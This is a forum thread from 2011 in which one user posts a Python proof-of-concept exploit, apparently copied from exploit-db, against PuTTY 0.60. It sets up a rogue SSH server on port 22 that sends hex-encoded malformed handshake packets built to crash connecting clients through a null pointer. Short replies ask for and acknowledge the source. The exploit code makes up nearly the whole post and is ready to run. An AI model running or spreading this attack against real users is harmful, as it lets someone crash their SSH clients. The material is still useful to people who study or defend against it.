Serar Posted December 24, 2011 Report Share Posted December 24, 2011 (edited) print "\n"print "----------------------------------------------------------------"print "| putty 0.60 Null Ptr |"print "| Level Smash the Stack |"print "----------------------------------------------------------------"print "\n"import sys, socket, binasciiHOST = sys.argv[1]PORT = 22s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.bind((HOST, PORT))s.listen(1)conn, addr = s.accept()buf = [ ("5353482d322e302d57654f6e6c79446f20322e312e330d0a"), ("000001ec0a14b940c70d1910a6effb0e2228c49c0042000000366469666669652d68656c6c6d616" "e2d67726f7570312d736861312c6469666669652d68656c6c6d616e2d67726f757031342d7368613" "10000000f3f407d89a1f204f37373682d647373000000826165733132382d6362632c336465732d6" "362632c626c6f77666973682d6362632c6165733139322d6362632c6165733235362d6362632c726" "96a6e6461656c3132382d6362632c72696a6e6461afb93139322d6362632c72696a6e6461656c323" "5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73650000008261657" "33132382d6362632c336465732d6362632c626c6f77666973682db1fc632c6165733139322d63626" "32c6165733235362d6362632c72696a6e6461656c3132382d6362632c72696a6e6461656c3139322" "d6362632c72696a6e6461656c3235362d6362632c72696a6e6461656c2d636263406c797361746f7" "22e6c69752e736500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6" "d64352c6e6f6e6500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6" "d64352c6e6f6e65000000097a6c69622c6e6f6e65000000097a6c69622c6e6f6e650000000000000" "111001111111111111111111111111111"), ## The 00 controls the crash ("0000023c091f00000095000000077373682d72736100000001230000008100d207286d90ff369d3" "64d9e3606ff18d6162088b426894f6216ca7709f7faa22d2e32065064d9c899a687746f3197fcc3c" "76d8cc643afdf14ba36252516f2b8b9ff3b131645f22bfd5f4b0b980acb4985e1c73bc3248559edd" "85fc2435d79e10462e1b662161e12fbc515a20a22ddd8901a1b5a231867d8f34d2196bfa01ddc5b0" "000010100847a283aff19a2abfe32490a2a941179c0c8076ab32421040d3ae88e6086049b53a9b97" "3967991ed7625dd05c85a54b4067d9e9941506158b9927002e71b84630f445eac743cf6050c5b43d" "a22cb8b7f559bb6f425c190b026e790f6924bf2d677f433674d1e31b71acc224c1c5979416f8f06a" "f70e92559b53ca23b82c852ec67ad35380e0d14ae96681bc4bddd3f73204cfc43b981fae94537a15" "3766aecd1ad963de610210b37f871b4b2939c934115ee3798062747bc22af375ba14b68077757bf3" "b45edf6ee8998f6f33a25092cb7789eb08c77cc2f26fb9507dad63f4a077cb5af5dbf248facde1ca" "75f95e84d4b2786fe9799dc20e9195853628132b40000008f000000077373682d727361000000804" "20087d6c6d46453e1bd004c715ced8814674435d48cb897e5141c03f15af86d93ac98a3376d963bc" "6915b98f7157418a9e0cef85a66b1ba855782848b9ae9e5a83ae051ee298299b27056020c4598045" "ae6eb61f5b2537adb07fa2e7733ab83907d9c61eb11f237f8e0b4a51b544687a4eec2a1be2a1dcbf" "cac4453d629a47d000000000000000000"), ("0000000c0a15a1640000c32700008e14") ]i = 0for i in range(0,len(buf)): conn.send(binascii.unhexlify(buf[i])) i+=1conn.close()s.close()Source : http://www.exploit-db.com/exploits/18270/ Edited December 24, 2011 by Serar Quote Link to comment Share on other sites More sharing options...
pyth0n3 Posted December 24, 2011 Report Share Posted December 24, 2011 Source Quote Link to comment Share on other sites More sharing options...
Serar Posted December 24, 2011 Author Report Share Posted December 24, 2011 scuze crezusem ca am pus sursa Quote Link to comment Share on other sites More sharing options...